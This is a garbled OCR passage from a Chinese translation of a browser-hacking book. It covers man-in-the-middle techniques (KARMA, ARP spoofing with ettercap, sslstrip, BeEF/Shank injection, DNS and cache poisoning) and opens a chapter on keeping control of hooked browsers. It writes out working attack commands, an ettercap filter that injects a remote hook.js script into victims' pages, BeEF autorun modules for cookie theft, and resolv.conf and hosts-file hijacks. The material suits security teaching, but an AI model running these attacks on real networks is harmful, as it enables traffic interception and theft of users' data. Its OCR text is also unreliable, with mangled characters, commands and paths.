KARMA 是 Dino Dai Zovi 和 Shane Macaulay Œ 20044EJT È BJ — ETR”, 4 fiX Linux BJ 
MADWifi 驱 动 程序 的 补丁 。 使 用 这 套 工具 ， 可 以 让 计算 机 响应 任意 302.11 探 针 请 求 ， 而 且 不 需要 
SSID. 这 样 , 你 就 可 以 装扮 成 默认 或 之 前 连接 的 无 线 接 入 点 ,引诱 客户 端 连 接 你 。 在 很 多 操作 系 
统 中 ， 重 新 连接 之 前 已 知 的 无 线 网 络 都 是 默认 执行 的 操作 。 

这 套 工 具 中 还 包含 一 些 模块 ， 不 仅 能 让 你 自动 装扮 成 无 线 接 人 点 ， 还 能 让 你 装扮 成 DHCP 服 
务 器 、DNS 服 务 器 ， 当 然 还 有 Web 服 务 器 。 没 错 ， 使 用 KARMA 也 可 以 装扮 成 Web 代 理 ， 在 所 有 
Web 请 求 中 注入 初始 化 的 JavaScript 指 令 。 
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使 用 代理 动态 修改 流量 并 不 新 鲜 。 使 用 代理 软件 执行 各 种 有 意思 的 、 不 寻常 的 任务 早已 司空 
见 惯 。 比 如 ,运行 透明 代理 在 用 户 浏览 器 中 水 平 翻转 已 经 演 染 的 图 片 ”, 截获 苹果 Siri 的 流量 定制 
家 居 自 动 化 ， 以 控制 用 户 的 温度 调节 器 *。 

3. ARP 欺 骗 

ARP ( Address Resolution Protocol， 地 址 解析 协议 ) 欺骗 ， 也 称 为 ARP 下 毒 ， 指 的 是 欺骗 一 

个 设备 把 本 来 应 该 发 到 别处 的 数据 发 给 你 ， 有 些 类 似 于 把 邮件 重 定向 到 另 一 个 设备 。 

收 到 数据 后 ， 你 甚至 可 以 自己 再 转发 ， 从 而 不 引起 目标 的 警觉 。 不 光 是 转发 ， 你 还 可 以 在 目 

标 不 知道 的 情况 下 修改 内 容 。 实 际 上 , 通过 网 络 通信 的 时 候 , 很 多 协议 都 起 不 到 一 个 薄 薄 的 信封 

所 能 起 到 的 保护 作用 。 

简单 地 说 ,ARP 用 于 从 IP 地 址 到 MAC 地 址 的 网 络 层 地 址 解析 ,这 种 从 第 三 层 到 第 二 层 的 映射 ， 

为 ARP 欺 骗 提 供 了 绝 好 的 机 会 。 以 下 流程 是 ARP 请 求 在 IPv4 网 络 中 正常 工作 的 过 程 。 

O 计算 机 A C10.0.0.1) 要 与 服务 器 B ( 10.0.0.20 ) 通信 ， 因 此 它 在 自己 的 ARP 绥 存 中 查询 

10.0.0.20 的 MAC 地 址 。 

O 如 果 找 到 MAC 地 址 ， 流 量 将 通过 网 络 接口 被 提交 到 该 MAC 地 址 。 

OQ 如 果 没 有 找到 MAC 地 址 ， 则 向 本 地 网 段 广 播 一 条 ARP 消 息 ， 询 问 哪个 MAC 地 址 的 了 是 
10.0.0.20。 这 个 请 求 会 被 提交 给 MAC 地 址 FF:FF:FF:FF:FF:FF， 然 后 具有 相应 卫 地 址 的 网 
络 适配器 就 会 响应 。 

口 服务 器 B 接 收 到 这 个 请 求 ， 于 是 将 自己 的 MAC 地 址 作为 响应 提交 给 计算 机 A 的 MAC 地 址 。 

图 2-5 展 示 了 Wireshark 中 的 一 个 ARP 请 求 与 响应 的 示例 。 
































X enO [Wireshark 1.6.5 (SVN Rev 40429 from /trunk-1.6)] 
File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


SHAH ZBAxeeir._eonFsSSi aaah seeseis 
Filter: (ia er re -| Expression... Clear App 


Dest Port | Protocol} Length | Info 
97 43.008795 BillionE 27:d3:8a Apple 06:85:22 ARP 42 Who has 192.168.1.1? Tell 192.168.1.254 
98 43.008852 Apple_06:85:22 BillionE 27:d3:8a 42 192.168.1.1 is at 60:c5:47:06:85:22 








图 2-5 Wireshatk 中 的 ARP 流 量 


ARP 其 骗 之 所 以 成 为 可 能 ， 是 因为 ARP 协 议 没 有 办 法 验证 ARP 流 量 。 而 让 ARP 坎 骗 特 别 有 效 
的 一 点 ， 就 是 你 不 需要 等 待 广播 请 求 MAC 地 址 。 

相反 , 你 可 以 主动 告诉 目标 机 融 哪 个 人 P 地 址 映射 到 哪个 MAC 地 址 , 即 向 目标 系统 凭空 发 送 一 
条 ARP 消 息 。 这 条 消息 会 更 新 目标 的 本 地 ARP 缓 存 ， 把 你 伪造 的 内 容 保存 起 来 ， 从 而 使 后 续 的 所 
有 了 流量 都 发 送 给 你 ， 而 不 是 受害 机 器 。 

Alberto Ornaghi 和 Marco Valleri 开 发 的 ettercap”“, 是 在 本 地 网 络 中 执行 这 种 中 间 人 攻击 的 最 流 
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行 的 工具 之 一 。 除 了 ARP 坎 驴 攻 击 ， 这 个 工具 还 可 用 于 执行 DHCP 坎 骗 、 端 口 盗 视 和 数据 包 过 滤 
等 。Dug Song 开 发 的 工具 dsnifEs 与 ettercap 类 似 , 提供 的 功能 包括 对 伪证 嗅 探 及 其 他 中 间 人 攻击 的 
多 种 过 滤器 。 
如 果 在 一 个 对 等 网 络 中 实施 下 面 这 个 ARP 欺 骗 的 例子 ,， 有 可 能 造成 系统 宕 机 。 因 此 这 个 例子 
以 及 所 有 例子 都 要 谨慎 操作 。 记 住 这 一 点 后 ， 就 可 以 在 命令 行 中 输入 以 下 命令 来 使 用 ettercap: 
ettercap -T -Q -M arp:remote -i «network interface» /<target1>/ /<target2>/ 
其 中 的 属性 具有 以 下 含义 。 
口 -T: 在 文本 模式 中 运行 。 
口 -Q: 在 超级 安静 模式 中 运行 ， 很 多 输出 都 不 会 出 现 了 。 
口 -M: 执行 中 间 人 攻击 。 
Qarp:remote: 指定 中 间 人 攻击 的 方式 是 ARP 欺 骗 。remote 选 项 可 以 让 你 嗅 探 到 针对 茶 
个 网 关 的 远程 IP 流 量 。 
口 -i: 指定 网 络 接口 ， 比 如 wlan0。 
a 最 后 两 个 Larget 用 于 指定 要 攻击 的 JP 地址 , 可 以 是 一 个 IP 地 址 范围 , 也 可 以 是 整个 子 网 。 
例如 ， 要 对 流量 经 过 网 关 的 子 网 中 的 所 有 主机 欺骗 ， 可 以 指定 /<gateway IP>/ //。 
执行 前 面 命令 的 输出 类 似 如 下 所 示 ， 包 括 本 地 网 络 上 从 DropBox 到 一 个 客户 端的 HTTP 响 应 
的 可 视 化 显示 : 


ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA 












































Listening on en0... (Ethernet) 
en0 -> 60:C5:47:06:85:22 192:168.T.T 255425525540 


SSL dissection needs a valid 'redir command on' script in the etter.conf 
file 
Privileges dropped to UID 65534 GID 65534... 


0 plugins (disabled by configure...) 
39 protocol dissectors 
53 ports monitored 
7587 mac vendor fingerprint 
1698 tcp OS fingerprint 
2183 known services 


Randomizing 255 hosts for scanning... 

Scanning the whole netmask for 255 hosts... 
===================================>| 100.00 $ 
4 hosts added to the hosts list... 

ARP poisoning victims: 


GROUP 1 : 192.168.1.254 00:04:ED:27:D3:8A 


GROUP 2 : ANY (all the hosts in the list) 
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Starting Unified sniffing... 


Text only Interface activated... 
Hit 'h' for inline help 


Packet visualization restarted... 





Sun Mar 3 11:24:11 2013 
TCP 108.160.160.162:80 --» 192.168.1.101:50113 | AP 


HTTP/1.1 200 OK. 

X-DB-Timeout: 120. 

Pragma: no-cache. 

Cache-Control: no-cache. 

Content-Type: text/plain. 

Date: Sun, 03 Mar 2013 03:24:08 GMT. 

Content-Length: 15. 

"ret": "punt"j 

除了 简单 的 ARP 嗅 探 ，ettercap 还 有 插件 和 过 滤器 , 让 你 在 流量 经 过 系统 时 对 其 进行 修改 。 这 
样 就 为 你 向 目标 浏览 器 注入 初始 化 指令 打开 了 方便 之 门 。 

在 创建 针对 Web 流 量 的 注入 过 滤器 时 ， 经 常会 遇 到 一 个 问题 ， 就 是 Web 服 务 器 经 常会 压缩 发 
回 的 数据 。 这 样 就 让 攻击 更 复杂 了 ， 从 而 增加 了 工作 量 。 

此 时 有 两 个 选择 。 一 是 破坏 AcceptEncoding 首 部 ， 二 是 将 Accept-Encoding 的 值 奉 换 为 
identity。identity 值 可 以 保证 服务 器 不 使 用 压缩 , 而 且 总 会 返回 纯 文本 数据 。 这 样 就 会 让 攻 
击 变 得 简单 多 了 。 

在 ettercap 中 创建 过 滤器 以 修改 流量 (假设 是 纯 文本 数据 )， 无 非 就 是 创建 一 个 包含 类 似 以 下 
代码 的 文本 文件 : 





















































if (ip.proto == TCP && tcp.src == 80) { 
replace("</body>", "<script src='http://browserhacker.com/hook.js'> 
</script></body>"); 


replace("Accept-Encoding: gzip, deflate", 
"Accept-Encoding: identity "ys 
} 


保存 这 个 文件 后 ， 执 行 如 下 命令 ， 就 可 以 把 它 转换 成 ettercap 过 滤器 : 

etterfilter input.txt -o hookfilter.ef 

要 通过 ettercap 运 行 这 个 过 滤 需 ， 需 要 通过 -F 选 项 来 指定 .ef 文件 ， 比 如 : 

ettercap -T -Q -F hookfilter.ef 

-M arp:remote -i < 网 络 接口 > // // 

最 后 , 通过 指定 两 个 空 目标 ,可 以 让 ettercap 对 其 检测 到 的 所 有 流量 都 执行 ARP 欺 骗 ， 而 不 局 
限于 特定 的 人 PP 地址。 当然 ,如 果子 网 中 的 客户 端 非常 之 多 ,也 要 注意 ， 因 为 子 网 中 所 有 对 外 通信 
的 主机 的 流量 ， 都 会 一 下 子 集中 到 你 这 里 来 。 而 这 会 在 不 经 意 间 导致 网 络 拒绝 服务 。 因 此 ， 我们 
推荐 把 网 关 作为 目标 ， 毕 竞 大 多 数 Web 流 量 都 经 过 网 关 。 
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sslstrip 


Moxie Marlinspike 的 sslstrip 是 一 个 发 布 于 2009 年 的 工具 ,用 于 透明 地 劫持 HTTP 流 量 。 这 个 
工具 的 原理 是 查找 HTTPS 链 接 ， 重 定向 并 修改 它们 ， 使 之 通过 一 个 本 地 代理 使 用 HTTP。 使 用 
这 个 工具 可 以 自 改 和 查看 想 通 过 HTTPS 传 输 的 流量 。sslstrip 自 身 并 不 包含 内 置 的 ARP 欺 骗 功 
能 ， 但 将 其 与 arpspoof 或 ettercap 一 块 使 用 也 很 简单 。 

要 了 解 关 于 sslstrip 的 更 多 信息 ， 可 以 参考 这 个 链接 : http://www.thoughtcrime.org/software/ 
sslstrip/. 


虽然 ettercap 的 用 途 很 多 , 可 以 用 来 执行 各 种 中 间 人 攻击 , 但 我 们 主要 想 使 用 它 来 向 目标 浏览 
器 注入 初始 化 指令 。 前 面 的 例子 演示 了 如 何 使 用 ettercap ， 不 过 Ryan Linn 和 Steve Ocepek 的 研究 
表明 ， 还 有 比 这 种 攻击 更 快 的 方式 。 
个 工具 就 是 Shank， 利 用 了 BeEF 及 Metasploit 的 PacketFu 库 。Shank 会 在 流量 经 过 本 地 子 网 
时 ， 自 动 将 BeEF 的 初始 控制 代码 注入 其 中 。 
自动 化 的 背后 是 Ruby 脚 本 在 执行 ARP 欺 骗 和 HTTP 内 容 注 入 。Shank 会 与 BeEF 通 信 ， 确 定 某 
个 受害 PP 地 址 是 否 已 经 被 注入 了 初始 控制 代码 。 如 果 没 有 ， 它 才 会 注入 。 这 样 就 能 保证 对 每 个 浏 
览 器 只 注入 一 次 控制 代码 。 
为 了 执行 攻击 , 需要 安装 和 运行 BeEF, 而 且 系 统 还 要 有 PacketFu 库 。 可 以 使 用 如 下 命令 安装 
这 个 库 : 
gem install packetfu 
通过 https://github.com/SpiderLabs/beef injection framework 下 载 相应 脚本 后 ， 需 要 配置 环境 。 
首先 ， 在 shank.rb 中 更 新 eabeef_ip 设 置 : 


DEBUG = true 
ARP_TIMEOUT = 30 















































Gbeef ip = '192.168.2.54' 
Gbeef user - 'beef' 
Gbeef pass = 'beef' 





其 次 ,需要 更 新 autorun.rb 文 件 。 这 个 文件 用 于 指定 哪些 模块 在 新 的 浏览 器 一 连接 到 BeEF 时 
就 立即 执行 。 可 以 在 @autorun_mods 数 组 中 看 到 那些 会 自动 执行 的 模块 。 














# REST API root ṣa, 

ATTACK_DOMAIN = "127.0.0.1" 

RESTAPI_HOOKS = "http://" + ATTACK_DOMAIN + ":3000/api/hooks" 
RESTAPI_LOGS = “http://" + ATTACK_DOMAIN + ":3000/api/logs" 
RESTAPI_MODULES = "http://" + ATTACK_DOMAIN + ":3000/api/modules" 
RESTAPI_ADMIN = "http://" + ATTACK_DOMAIN + ":3000/api/admin" 
BEEF_USER = "beef" 

BEEF_PASSWD = "beef" 


Gautorun mods = [ 
( 'Invisible iframe' => {'target' => 'http://192.168.50.52/' }}, 
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{ 'Browser_fingerprinting' => {}}, 
{ 'Get cookie' => {}}, 
{ 'Get_system_info' => {}} 

] 


配置 这 两 个 文件 后 ， 一 切 就 准备 就 绪 了 。 然 后 打开 终端 ， 在 新 的 窗口 中 执行 以 下 步 又。 
(D 启动 BeEF (在 相应 的 文件 夹 中 ); ruby beef. EE 

(2) 启动 Shank: ruby shank.rb < 目标 网 络 地 址 >。 

(3) 启动 自动 运行 脚本 : ruby autorun.rb。 

做 完 这 些 后 ， 应 该 可 以 在 三 个 终端 窗口 中 看 到 活动 发 生 了 。 当 然 ， 你 可 以 直接 访问 BeEF 管 
理 界面 : http://127.0.0.1:3000/ui/panel/。 

CORE Security 的 Taylor Pennington 也 开发 了 一 个 工具 , 可 以 用 来 跟 BeEF 注 入 配合 执行 类 似 的 
ARP 坎 骗 攻 击 。 这 个 工具 就 是 g0tBeEF ， 详 情 地址 在 这 里 : https://github.com/kimj-1/g0tBeEF . 

4. DNS 下 毒 

ARP 下 毒 是 一 种 把 你 的 计算 机 插 到 本 地 网 络 中 两 个 节点 之 间 的 好 办 法 , 但 它 并 非 在 任何 情况 
下 都 有 效 。 有 时候， 我 们 还 可 以 采用 男 一 种 中 间 人 攻击 手段 ， 即 在 DNS (Domain Name System, 
域名 系统 ) 记录 中 下 毒 。 

ARP 是 把 IP 地 址 转换 为 MAC 地 址 ， 而 DNS 是 把 域名 转换 为 IP 地 址 。 简 单 地 说 ，DNS 可 以 把 
browserhacker.com 转 换 为 IP 地 址 : 213.165.242.10。 

DNS 的 工作 机 制 涉及 多 个 层次 。 首 先 ， 本 地 DNS 查询 发 生 在 你 的 计算 机 上 ,查询 的 是 计算 组 
存 和 hosts 文 件 。. 如 果 在 这 个 层次 上 找 不 到 结果 , 就 会 向 计算 机 中 设 定 的 DNS 服务 器 发 送 DNS 请 求 。 

这 样 ， 向 DNS 下 毒 也 就 有 了 很 多 可 乘 之 机 。 比 如 ， 可 以 针对 顶级 DNS 服务 器 、 低 级 DNS 服务 
器 ， 甚 至 针对 目标 的 本 地 DNS 缓存 。 如 果 你 可 以 控制 这 些 DNS 记录 ， 就 可 以 对 目标 发 送 自己 的 啊 
应 。 不 言 而 喻 ,你 也 就 有 机 会 运行 自己 的 初始 化 代码 了 。 


自 改 客户 端的 DNS 设置 

在 不 同 的 操作 系统 中 ， 自 改 DNS 设 置 的 途径 也 不 一 样 。 

Windows 

在 现代 Windows 系 统 中 ， 通 过 编辑 C:\Windows\System32\drivers\etc\hosts， 可 以 搞 入 任意 
DNS A o 多 数 情 况 下 , 都 必须 拥有 管理 员 权 限 才 能 编辑 这 个 文件 ,这 个 文件 中 条 目的 格式 为 : 

<ip address><dns name> 

比如 ， 要 想 让 某 个 计算 机 访问 谷歌 时 打开 你 的 网 站 ， 可 以 在 这 个 文件 中 添加 以 下 条 目 : 

< 你 的 IP 地 址 > www.google.com 

除了 向 本 地 hosts 文 件 中 插入 任意 记录 ， 还 可 以 在 命令 行 中 针对 特定 的 网 络 接口 更 新 
Windows DNS 设置 。 在 被 侵入 的 计算 机 中 ,可 以 通过 批 处 理 文件 或 小 型 编译 程序 执行 如 下 命令 : 


的 


意 DNS 服 务 器 的 IP 地 址 > 
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还 可 以 简写 为 : 

netsh interface ip set dns "Local Area Connection" static <IP> 

Linux/Unix/OS X 

Linux、Unix 和 OS 义 系 统 的 hosts 记 录 保 存在 /etc/hosts 中 。 这 个 文件 中 条 目的 格式 与 Windows 
的 hosts 文 件 类 似 ， 同 样 也 需要 root 权 限 才 能 修改 。 

这 些 操作 系统 中 的 DNS 设置 都 依赖 于 /etc/resolv.conf 文 件 。 在 权限 正确 的 情况 下 ,可 以 通过 
以 下 命令 来 修改 这 个 文件 : 


echo "nameserver < 恶意 DNS 服务 器 的 IP 地 址 >"” > /etc/resolv.conf 








除了 修改 客户 端 DNS 设置 之 外 , 另 一 个 可 以 影响 DNS 的 地 方 是 本 地 网 络 层 。 利 用 前 面 讨 论 的 
ARP 下 毒 攻击 ， 可 以 把 你 的 计算 机 设置 为 本 地 网 络 的 DNS 服务 器 。 

前 面 介绍 的 ettercap 中 提供 一 个 名 为 DNSSpoof 的 模块 ， 可 以 自动 帮 你 执行 此 类 攻击 。 首 先 ， 
要 修改 etterdns 文 件 ， 添 加 你 的 恶意 DNS 条 目 。 在 Linux 系 统 中 ， 这 个 文件 的 位 置 一 般 是 
/usrshare/ettercapy/etterdns， 而 在 OSX 中 , 则 通常 是 /optUlocalshare/ettercapy/etterdns。 执 行 攻击 时 ， 
还 是 像 以 前 一 样 运行 ettercap ， 但 同时 还 必须 指定 一 个 插件 : 

ettercap -T -Q -P dns_spoof -M arp:remote 

-i < 网 络 接口 > /< 要 攻击 的 IP 地 址 >/ // 

在 上 述 所 有 情况 下 ， 只 要 控制 了 目标 计算 机 或 网 络 的 DNS, 你 就 可 以 装扮 成 任何 名 字 的 计算 
机 或 服务 器 。 那 怎么 利用 这 个 中 间 人 攻击 技术 注入 初始 化 控制 代码 呢 ? 建议 你 首先 监控 正常 的 
Web 流 量 ， 看 一 看 是 否 使 用 了 代理 服务 器 。 如 果 使 用 了 ， 那 最 好 装扮 成 这 个 代理 服务 器 ， 因 为 本 
地 浏览 器 无 论 如 何 都 会 把 请 求 提 交 给 它 。 

5. 利用 缓存 

Robert Hansen” 发现 ， 浏 览 器 使 用 非 公开 可 路 由 亿 地 址 缓存 来 源 存 在 安全 问题 。 浏 览 器 使 用 
的 P 地 址 范围 是 10.0.0.0/8 、172.16.0.0/12 和 192.168.0.0/16。Hansen 演 示 了 在 某 些 情况 下 ， 可 以 向 
某 个 来 源 注 入 恶意 代码 。 

如 果 目 标 使 用 了 相同 的 非 可 路 由 地 址 连接 男 一 个 网 络 , 就 为 你 提供 了 下 手 的 机 会 。 这 种 攻击 
甚至 可 以 让 你 绕 过 SOP 潜 入 内 部 服务 器 。 

举 个 例子 , 某 目标 可 能 在 一 家 网 吧 上 网 ,而 你 已 经 侵入 了 这 家 网 吧 。 于 是 , 你 可 以 使 用 前 面 
介绍 的 ARP 中 间 人 攻击 技术 ,修改 网 络 中 的 任何 HTTP 请 求 。 当 然 ， 你 得 提前 规划 好 ， 而 且 外 网 
必须 有 一 个 你 控制 的 BeEF 服 务 吉 运行。 

(1) 中 间 人 攻击 开始 后 ， 可 以 等 待 目 标的 任何 HTTP 请 求 。 然 后 ， 在 响应 中 插入 多 个 IFrame， 
从 你 的 每 个 目标 PP 加 载 内 容 。 

(2) 加 载 的 内 容 可 以 缓存 到 目标 浏览 器 。 每 个 IFrame 加 载 的 内 容 都 可 以 舱 入 初始 化 指令 ， 并 
且 可 以 回 连 到 外 网 的 BeEF 服 务 需 。 

(3) 当 目 标 断 开 对 外 网 的 连接 时 ,或 者 回 到 办 公 室 或 家 里 继续 上 网 时 ,浏览 需 还 会 不 断 与 BeEF 
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服务 器 保持 通信 。 

(4) 如 果 后 续 某 个 阶段 ， 目 标 访问 了 某 个 私有 JP 地 址 ， 比 如 他 家 路 由 器 的 管理 页 面 ， 那 你 之 
前 缓存 的 内 容 就 会 在 该 源 中 执行 。 

这 些 情 况 在 特定 的 VPN 环 境 下 也 能 加 以 利用 ， 前 述 过 程 也 是 类 似 的 。 这 当然 可 能 是 由 于 
JavaScript 一 旦 在 浏览 带 中 执行 , 就 有 可 能 长 期 保存 ， 比 浏览 器 缓存 , 甚至 比 DNS 缓存 保存 的 时 间 
还 要 长 。 

本 节 介 绍 了 一 些 即使 不 利用 Web 应 用 的 隐患 ,也 能 在 浏览 器 中 执行 恶意 代码 的 技术 。 有 时 候 ， 
只 要 拥有 茶 个 网 络 的 访问 权 ， 就 可 以 对 目标 注入 初始 化 控制 代码 。 














2.3 小 结 


本 章 主要 关注 的 是 利用 浏览 器 的 信任 人 侵 时 面临 的 第 一 道 障碍 。 虽 然 我 们 想 尽 力 全 面 地 展示 
各 种 向 浏览 器 注入 亚 意 代码 的 方式 ,但 没有 一 种 方法 介绍 得 非常 详细 。 浏 览 器 一 直 在 进步 ， 而 互 
联网 的 快速 发 展 , 以 及 所 有 攻击 技术 都 能 在 网 上 找到 ,只 是 导致 这 个 攻击 面 不 断 变化 的 两 个 主要 
因素 。 

我 们 探索 了 不 同 的 方法 , 每 种 方法 只 关注 实现 控制 浏览 咒 这 个 目标 的 主要 手段 及 技术 。 而 当 
你 打开 这 扇 安 全 门 之 后 ， 会 惊讶 地 发 现 原来 浏览 器 能 够 提供 给 你 那么 多 的 信息 。 

当然 , 执行 初始 化 指令 只 是 你 必须 跨越 的 两 个 重要 障碍 中 的 一 个 。 男 一 个 要 跨越 的 障碍 就 是 
想方设法 保持 与 人 侵 浏览 器 的 通信 渠道 畅通 。 攻 击 浏览 器 过 程 中 的 下 一 步 都 有 哪些 内 容 需要 了 
解 ? 下 一 章 将 为 你 揭晓 。 















































2.4 问题 


(1) 攻击 者 如 果 想 在 浏览 器 中 执行 自己 的 代码 ， 需 要 采取 哪些 手段 ? 

(2) 描述 一 下 几 种 XSS 攻 击 的 不 同 之 处 。 

(3) 描述 一 下 可 能 阻止 XSS 执 行 的 浏览 器 安全 机 制 。 

(4) 说 出 几 个 著名 的 XSS 病 毒 ， 以 及 它们 的 传播 方式 。 

(5) 描述 一 种 攻击 者 可 能 采用 的 侵入 网 站 并 执行 恶意 代码 的 方法 。 

(6) 什么 条 件 下 可 以 使 用 sslstrip? 

(7) 描述 一 下 ARP 欺 骗 。 

(8) 钓鱼 与 垃圾 邮件 有 什么 区 别 ? 

(9) 简单 概括 一 下 社会 工程 攻击 的 几 个 步骤 。 

(10) 描述 一 下 什么 是 物理 “诱饵 ”技术 。 

要 查看 问题 的 答案 ， 请 访问 本 书 网 站 https:/browserhacker.comyanswers ， 或 者 Wiley 的 网 站 
http:/www.wiley.comy/go/browserhackershandbook。 
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如 果 你 好 不 容易 踏 进 了 屋 门 , ALT ETX FE 地 一 声 关 上 了 , 那 还 有 什么 意思 呢 ? 
第 2 章 讲解 的 就 是 怎么 迈进 屋子 的 技术 。 紧 接着 ， 你 得 知道 怎么 让 屋 门 始终 为 你 敞开 。 用 黑客 的 
话说 ,就 是 在 你 获得 了 对 浏览 器 的 初始 控制 之 后 ,必须 想 办 法 将 控制 持久 化 。 这 也 就 是 我 们 浏览 
需 攻 击 方法 论 中 的 持续 控制 (了 Retaining Control ) 阶段 。 

对 目标 的 持续 控制 可 以 宽泛 地 分 成 两 个 方面 ,一 方面 是 持久 通信 (Retaining Communication ), 
另 一 方面 是 持久 存续 (Retaining Persistence )。 持 久 通 信 的 基础 是 建立 一 种 机 制 , 通过 持久 的 通信 
渠道 , 保障 对 一 个 或 多 个 浏览 器 的 持续 控制 。 持久 存续 的 技术 涉及 让 通信 渠道 保持 畅通 , 无论 用 
户 采 取 什 么 动作 都 不 受 干扰 。 

在 后 面 几 章 里 , 我 们 会 看 到 很 多 攻击 需要 时 间 执 行 ， 有 的 甚至 需要 秒 级 的 时 间 。 在 执行 连锁 
攻击 时 ,这 些 时 间 会 县 加 起 来 ,因为 有 很 多 操作 混在 一 起 。 在 这 种 情况 下 ,拥有 一 个 稳定 的 通信 
渠道 , 是 任何 浏览 器 攻击 活动 的 必要 前 提 。 没有 这 个 前 提 , 一 旦 时 间 不 够 用 , 你 就 会 被 打 回 原点 。 

本 章 介 绍 一 些 对 目标 浏览 器 进行 持续 控制 的 技术 ， 为 实现 攻击 目标 提供 时 间 保 障 。 不 过 ， 
介绍 的 这 些 方法 绝 非 全 部 。 有 些 你 可 能 已 经 了 解 了 ,而 有 些 可 能 只 适用 于 特定 的 浏览 絮 类 型 和 
版 本 。 


3.1 理解 控制 持久 化 


保持 对 目标 的 控制 比 执行 初始 化 指令 还 要 困难 。 除非 你 有 办 法 把 代码 注入 每 个 页 面 , 否则 目 
标 浏览 需 一 切换 网 址 ,控制 就 会 立即 消失 。 理 想 情况 下 ， 保 持 对 浏览 需 的 控制 不 仅 意味 着 断 开 网 
络 时 不 失去 控制 ， 同 时 也 意味 着 与 用 户 访问 哪个 网 站 不 相关 。 

为 什么 非得 保证 对 浏览 器 的 持续 控制 呢 ? 如 果 可 以 在 目标 浏览 器 中 执行 代码 , 就 以 为 做 完了 
所 有 的 事 , 这 样 对 吗 ?” AN, 大 错 特 错 ， 这 远 远 不 够 ! 假设 你 想 知 道 目标 浏览 絮 所 在 的 本 地 网 络 有 
哪些 主机 是 活动 的 , 然后 紧 接 着 来 一 番 JavaScript 端 口 扫 描 。 检测 过 程 可 能 得 花 点 时 间 , 取决 于 活 
动 主机 和 端口 的 多 少 。 显 然 ， 这 种 情况 下 你 需要 在 一 定 的 时 间 内 保持 对 浏览 圳 的 控制。 

持续 控制 目标 可 以 大 致 分 为 两 个 方面 , 一 方面 是 持久 通信 , 男 一 方面 是 持久 存续 。 这 两 个 方 
面 同等 重要 ， 因 为 它们 能 够 延长 你 攻击 浏览 器 的 可 用 时 间 。 

持久 通信 的 实现 靠 的 是 使 用 不 同 渠道 接触 被 你 控制 的 服务 器 。 某 些 情况 下 , 甚至 不 靠 HTTP， 
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而 只 靠 DNS 就 可 以 做 到 。 你 可 以 选择 其 中 速度 最 快 的 , 但 有 可 能 牺牲 与 旧 浏 览 器 的 通信 。 接 下 来 
几 节 会 探讨 这 方面 的 权衡 。 

传统 操作 系统 中 的 黑客 程序 为 了 实现 持续 控制 ， 往 往 会 通过 勾 连 系统 调用 :， 直 接 在 内 核 其 
至 驱动 程序 中 注入 代码 ， 保 证 操作 系统 在 重启 、 更 新 ， 甚 至 在 系统 清理 后 ， 仍 然 可 以 持续 控制 。 
对 你 而 言 ， 如 果 目 标 关 闭 了 浏览 器 ， 那 几乎 就 没戏 了 ， 至 少 暂时 是 这 样 。 

AE 

本 章 和 上 一 章 介绍 的 技术 综合 起 来 运用 ， 可 以 实现 所 谓 浏览 器 勺 连 ( Browser Hooking )。 
义 连 浏览 器 指 的 就 是 与 目标 浏览 器 建立 双向 通信 渠道 的 过 程 。 本 书后 面 也 会 经 常 出 现 “ 义 连 浏 
览 器 ”的 说 法 。 大体 的 意思 就 是 指 浏览 器 已 经 被 人 初始 控制 , 执行 了 恶意 代码 , 而 且 又 从 BeEF 
等 中 心服 务 器 接收 到 了 更 多 指令 。 被 匀 连 的 浏览 器 在 接收 并 执行 了 更 多 指令 后 ， 结 果 将 被 异步 
返回 给 中 心服 务 器 。 

在 某 些 通信 渠道 下 ， 有 可 能 执行 高 级 连锁 攻击 ， 攻 击 的 形式 是 命令 模块 ， 按 照 一 定 的 肌 辑 
顺序 依次 执行 。 比 如 ， 在 建立 了 对 浏览 器 的 初始 控制 后 ， 首 先 可 以 取得 被 勾 连 浏览 器 的 内 部 IP 
地 址 。 掌 握 了 这 个 JP 之 后 ， 可 以 对 内 部 网 络 执行 ping 扫 描 。 最 后 对 响应 的 主机 执行 端口 检测 。 
这 些 操作 可 以 前 后 相继 ， 后 续 流程 可 以 根据 前 置 环节 的 执行 结果 做 出 相应 调整 。 



































通过 攻击 者 的 工具 箱 实现 了 不 同 攻 击 代 码 的 模块 化 之 后 ， 可 以 针对 一 个 隐患 执行 各 种 操作 。 
些 操 作 通 常会 对 攻击 者 给 出 反馈 循环 , 而 攻击 者 借 此 可 以 通过 一 个 特殊 操作 发 现 后 续 操 作 的 可 
性 ， 而 后 续 操 作 又 可 能 暴露 更 多 隐患 。 
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提 到 通信 ,首先 必须 理解 各 种 通信 渠道 的 工作 原理 。 在 选择 适当 的 渠道 时 ,必须 考虑 浏览 器 
是 否 支持 ， 以 及 速度 如 何 。 

一 些 使 用 先进 技术 日 非常 快速 的 渠道 ， 可 能 IE6 或 Opera 不 支持 。 根 据 你 的 需求 ， 这 可 能 是 个 
问题 。 比 如 ， 你 只 对 Chrome 感 兴趣 ， 因 为 你 想 攻 击 它 的 扩展 程序 。 于 是 ， 你 决定 使 用 WebSocket 
渠道 。 那 么 为 了 额外 的 速度 ， 你 可 能 就 得 牺牲 浏览 器 兼容 性 。 

几乎 每 一 种 通信 渠道 都 需要 用 到 轮 询 。 轮 询 就 是 客户 端 不 断 检 查 服务 器 是 否 有 变化 或 更 新 。 
实际 实现 轮 询 需要 客户 端 和 服务 器 的 配合 。 而 此 时 的 客户 端 是 被 注入 到 目标 浏览 器 中 的 JavaScript 
所 控制 的 ， 服 务 器 则 是 攻击 者 所 拥有 的 依赖 轮 询 的 软件 。 

需要 通信 渠道 主要 有 两 个 原因 : 检测 客户 端 是 否 断 开 连 接 , 以 及 从 服务 器 向 客户 端 发 送 新 命 
令 。 服 务 器 只 要 接 到 轮 询 请 求 ， 就 知道 客户 端 还 在 活动 ， 而 且 随 时 可 以 接收 新 命令 。 

接 下 来 几 小 节 , 我 们 将 介绍 几 种 创建 通信 渠道 的 技术 。 但 要 记 住 , 通信 渠道 是 动态 可 切换 的 。 
比如 ， 可 以 把 xMLHttpRequest 轮 询 作 为 默认 的 通信 渠道 ， 而 如 果 浏 览 器 支持 就 切换 到 
WebSocket。 至 于 WebRTC， 由 于 是 一 种 比较 新 的 技术 ,在 本 书写 作 时 只 有 Chrome 和 Firefox 支 持 ， 
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所 以 这 里 就 不 介绍 了 ”。 


3.2.1 使 用 xuLHttpRequest 轮 询 


XMLHttpRequest 对 象 非常 适合 作为 默认 的 通信 渠道 ， 因 为 所 有 浏览 器 都 支持 它 。 无 论 是 黑 
